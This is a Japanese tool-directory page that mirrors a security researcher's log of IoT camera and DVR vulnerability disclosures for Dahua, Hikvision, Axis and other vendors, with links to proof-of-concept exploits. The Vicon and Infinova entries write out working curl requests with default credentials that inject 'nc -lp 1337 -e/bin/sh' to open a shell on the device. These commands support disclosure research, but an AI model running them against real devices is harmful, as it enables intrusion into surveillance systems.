Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
ツール/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

リポジトリを見る
7833073年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PoC

雑多な PoC - (イン)セキュリティなモノのインターネット

これらの粗末な (イン)セキュリティ製品について読む価値があります: https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260

2021-10-19

すべてのクレジットは Watchful_IP (https://watchfulip.github.io/) に帰属します

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045

2021-10-06

詳細: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC: https://github.com/mcw0/DahuaConsole

2021-09-06

2 つの独立した認証バイパス。

再び「Dahua の大規模ハッキング」が発生する可能性が非常に高いため、Full Disclosure の詳細は 2021 年 10 月 6 日まで公開を保留します。

それまでの間、ファームウェアのアップグレードを強く推奨します。

https://www.dahuasecurity.com/support/cybersecurity/details/957

Dahua DES/3DES 暗号化/復号、NetSDK 認証情報漏えい、クラウド鍵/パスワード、DHP2P PoC

2020-05-09

  • Dahua DES/3DES (壊れた) 認証実装と PSK
  • 脆弱性: DVRIP および DHP2P プロトコル使用時に、Dahua NetSDK が REALM リクエスト内のすべてのクライアントの認証情報 (先頭 8 文字) を漏えいする
  • PoC: 復号した認証情報を平文で表示するシンプルな TCP/37777 DVRIP リスナーを追加
  • 脆弱性: Dahua DHP2P クラウドプロトコルでの認証情報の漏えい
  • 脆弱性: 23 の異なるプロバイダー向けにハードコードされた DHP2P クラウド鍵/パスワード
  • PoC: DHP2P クラウド内のデバイスへのアクセス。PoC は Dahua IMOU 専用に作成

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

更新: Dahua-JSON-Debug-Console-v2.py

2020-02-29

  • 'setDebug' オプションを追加。VTO/VTH のデバッグコンソールからの出力を開始するはずです
  • '--discover' を追加。デバイスのマルチキャスト検索、または UDP/37810 経由でのデバイスへの直接プローブ (--rhost 192.168.57.20)
  • デバッグコンソールに入らずにリモートホストの設定やサービスをダンプする '--dump {config,service}' を追加

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

更新

2020-02-15

今週 Dahua PSIRT との連絡が確立し、23 の異なるクラウドサプライヤーに関する詳細、PoC、証拠を提供しました。また、Google Zero の新しい試み『Policy and Disclosure: 2020 Edition』(私にとって理にかなっているため) にも従います。つまり、Dahua が 09.05.2020 19:00 UTC (May 9, 2020 19:00 UTC) より前に更新プログラムをリリースするか後になるかに関係なく、90 日後に公開します。

Dahua さん、この日までに修正して更新プログラムを提供してください...

参照: Google Zero『Policy and Disclosure: 2020 Edition』: https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

数時間前

2020-02-10

Dahua SDK からの認証情報漏えい (最終的に平文になる) を Dahua PSIRT に開示したばかりです。彼らがこの情報をどう受け止めるか見てみましょう。20 を超える異なるクラウドプロバイダーが関与しているのはかなり悪い状況です... 今日から 90 日間のカウントダウンが始まります。

ツール

2020-01-20

いくつかのツールを公開する予定の新しいリポジトリを作成しました。

https://github.com/mcw0/Tools

最初の公開: Dahua-JSON-Debug-Console-v2.py

  • Python 3 に移植
  • いくつかのバグとコード調整を修正
  • DVRIP (TCP/37777) のサポートを追加 [注: DHIP で動作する一部の JSON コマンドは DVRIP では何も返さない]
  • latin-1 でエンコード/デコード。0x00 - 0xff の未変更文字が必要になる可能性があるため
  • オプションとして hexdump を使用したより良い 'debug'

Axis Communications

2019-10-06 (古いもの)

Axis デバイスのモデルとファームウェアバージョンを匿名で検出 (1998 - 2019)。

https://github.com/mcw0/PoC/blob/master/axis-detect.py

Realtek Managed Switch Controller (RTL83xx) PoC

2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

複数のネットワークスイッチにおける複数の脆弱性

2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

すべての技術詳細と Python PoC は 2019 年 8 月 20 日にここに投稿されます。

LifeSafety Power

2019-05-15

複数のスタックオーバーフロー、RCE、ユーザー名/パスワードの平文での漏えいなど

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON デバッグコンソール (認証済み)

2019-04-10

このスクリプトは、通常の HTTP/HTTPS ポートと TCP/5000 で動作する Dahua の「DHIP」P2P バイナリプロトコルを使用します。

JSON を使用して Dahua デバイスの内部「デバッグコンソール」に接続します (以前の TCP/6789 でのデバッグと同じタイプ)。

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

楽しんでください、bashis

VDOO

2019-01-23

ご無沙汰しています、長い間公開していませんでした...

私はまだ活動して研究を続けていますが、ニュースとしては、ベンダー管理のために VDOO (https://www.vdoo.com/) とも協力しようとしており、そのため残念ながら Full Disclosure のプロセスがやや遅れています...

とにかく、私の GitHub で Full Disclosure としていくつかの興味深い研究が公開される予定です。

VDOO との協力により、私は自分の好きな仕事に取り組むことができ、(望まない | 理解しない | 無視したい | 遅らせたい | どうでもいい) といったベンダーに時間を無駄にしなくて済みます。

最新は Reolink (https://reolink.com/) 関連のもので、こちらにあります: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC} ヒープオーバーフロー、IPCP API、RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (認証済み)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} 認証済み RCE

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. IP カメラ/ビデオ/アクセス制御 複数のリモートコマンド実行 - 複数のスタックオーバーフロー - ダブルフリー - 不正アクセス https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

Geovision Inc. IP カメラ & ビデオサーバー リモートコマンド実行 PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

telnetd の有効化を許可するため、TCP/787 で動作する Herospeed TelnetSwitch デーモン。 小さなスタックオーバーフローにより、動的に生成されたパスワードを上書きして telnetd を有効化できます。 https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Foscam IPC ファームウェアイメージに対してさまざまな暗号鍵/ダイジェストと暗号をループ処理する小さな OpenSSL ラッパー。 https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

雑多な Foscam IPC バイナリとライブラリ内の文字列/ログイン/パスワード/暗号鍵を難読化解除 https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE と情報漏えい (および可能性のある他の OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

複数の OEM の 'nsd' バイナリにおけるリモートスタックフォーマット文字列 (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

画像はこちら: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

クラッシュしないフォーマット文字列バックドアの Proof of Concept

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (認証済み)

2017-12-03

// Enable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (認証済み)

2017-12-03

// Enable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

注: 同じものを共有する他の OEM もかなり確実に存在します。

Axis Communications

2017-12-01 Axis Communications MPQT/PACS ヒープオーバーフローと情報漏えい https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 リバース stunnel TLSv1 プライバシーシェル https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 Vivotek IP カメラ - リモートスタックオーバーフロー https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 Uniview RCE と設定エクスポート PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 2016 年第 3 四半期に行われた、RCE (PoC: リモート接続バックシェル) と /etc/shadow のリモート読み取りにつながった、古くて忘れられたファジングが 1 件あります。 2016 年第 3 四半期に Axis に報告され修正されましたが、良いヒントになるかもしれないので今もここに投稿しています。 https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Dahua で Telnetd を有効化 / 無効化 (新しいファームウェアバージョン向け) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Dahua バックドア PoC の公開再リリース https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

NSFOCUS によるレポートと shodan.io での独自調査から得た知識により、100 万台を超える信じがたい数の脆弱な Dahua / OEM デバイスが世の中に存在することを新たに知りました。

この知識に基づき、以前 4 月 5 日に述べたように Python PoC を公開しません。PoC は IPVM や他の独立したセキュリティ研究者によってすでに検証されているため、公開する必要はありません。

ただし、真剣なセキュリティ研究者であれば希望に応じて PoC を共有する用意があります。リスト外からメールで連絡し、あなたが誰であるかを明確にしてください。物乞いと誤解して無視しないように。

NSFOCUS レポート: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


Dahua のパッチの日時スタンプに気づきましたか? 以下のスクリーンショットを確認してください: http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

リストにあるのは NVR/DVR/IPC/HDCVI だけではありません

インターホンシステムも同様で、VTO2000A が確認されています http://www1.dahuasecurity.com/au/products/vto2000a-762.html

ツールをダウンロード